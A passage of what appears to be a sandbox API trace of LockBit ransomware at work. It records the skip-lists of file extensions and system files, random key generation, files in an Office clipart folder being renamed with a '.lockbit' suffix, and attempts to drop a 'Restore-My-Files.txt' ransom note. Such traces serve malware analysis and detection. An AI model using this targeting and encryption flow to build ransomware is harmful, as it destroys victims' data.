(pszPath="BD00141_.WMF") returned=".WMF" [0103.562] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.562] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.563] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.563] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD00141_.WMF") returned 1 [0103.563] lstrcmpiW (lpString1="ntldr", lpString2="BD00141_.WMF") returned 1 [0103.563] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD00141_.WMF") returned 1 [0103.563] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD00141_.WMF") returned 1 [0103.563] lstrcmpiW (lpString1="autorun.inf", lpString2="BD00141_.WMF") returned -1 [0103.563] lstrcmpiW (lpString1="thumbs.db", lpString2="BD00141_.WMF") returned 1 [0103.563] lstrcmpiW (lpString1="iconcache.db", lpString2="BD00141_.WMF") returned 1 [0103.564] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.564] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned=".WMF" [0103.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.564] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.564] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.565] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.565] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.565] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.565] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.lockbit") returned 72 [0103.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x814 [0103.565] CreateIoCompletionPort (FileHandle=0x814, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.565] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.565] GetFileSizeEx (in: hFile=0x814, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=26886) returned 1 [0103.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.566] ReadFile (in: hFile=0x814, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.571] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.571] malloc (_Size=0xa6) returned 0x77d800 [0103.571] NtSetInformationFile (FileHandle=0x814, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.571] free (_Block=0x77d800) [0103.571] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.572] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.572] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb983d700, ftCreationTime.dwHighDateTime=0x1bf148e, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb983d700, ftLastWriteTime.dwHighDateTime=0x1bf148e, nFileSizeHigh=0x0, nFileSizeLow=0x7114, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD00146_.WMF", cAlternateFileName="")) returned 1 [0103.572] lstrcmpiW (lpString1=".", lpString2="BD00146_.WMF") returned -1 [0103.572] lstrcmpiW (lpString1="..", lpString2="BD00146_.WMF") returned -1 [0103.572] PathFindExtensionW (pszPath="BD00146_.WMF") returned=".WMF" [0103.572] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.572] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.573] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.573] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.574] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD00146_.WMF") returned 1 [0103.574] lstrcmpiW (lpString1="ntldr", lpString2="BD00146_.WMF") returned 1 [0103.574] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD00146_.WMF") returned 1 [0103.574] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD00146_.WMF") returned 1 [0103.574] lstrcmpiW (lpString1="autorun.inf", lpString2="BD00146_.WMF") returned -1 [0103.574] lstrcmpiW (lpString1="thumbs.db", lpString2="BD00146_.WMF") returned 1 [0103.575] lstrcmpiW (lpString1="iconcache.db", lpString2="BD00146_.WMF") returned 1 [0103.575] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.575] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned=".WMF" [0103.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.575] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.575] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.575] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.lockbit") returned 72 [0103.575] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.576] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.576] malloc (_Size=0x40068) returned 0x3db00b8 [0103.576] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=28948) returned 1 [0103.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0103.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0103.577] ReadFile (in: hFile=0x81c, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.581] malloc (_Size=0xa6) returned 0x77d800 [0103.582] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.582] free (_Block=0x77d800) [0103.582] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d1cf00, ftCreationTime.dwHighDateTime=0x1bd4fa4, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d1cf00, ftLastWriteTime.dwHighDateTime=0x1bd4fa4, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD00155_.WMF", cAlternateFileName="")) returned 1 [0103.582] lstrcmpiW (lpString1=".", lpString2="BD00155_.WMF") returned -1 [0103.582] lstrcmpiW (lpString1="..", lpString2="BD00155_.WMF") returned -1 [0103.582] PathFindExtensionW (pszPath="BD00155_.WMF") returned=".WMF" [0103.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD00155_.WMF") returned 1 [0103.584] lstrcmpiW (lpString1="ntldr", lpString2="BD00155_.WMF") returned 1 [0103.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD00155_.WMF") returned 1 [0103.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD00155_.WMF") returned 1 [0103.584] lstrcmpiW (lpString1="autorun.inf", lpString2="BD00155_.WMF") returned -1 [0103.584] lstrcmpiW (lpString1="thumbs.db", lpString2="BD00155_.WMF") returned 1 [0103.584] lstrcmpiW (lpString1="iconcache.db", lpString2="BD00155_.WMF") returned 1 [0103.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned=".WMF" [0103.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.585] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.585] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.585] wsprintfW (in: param_1=0x3d6b290, 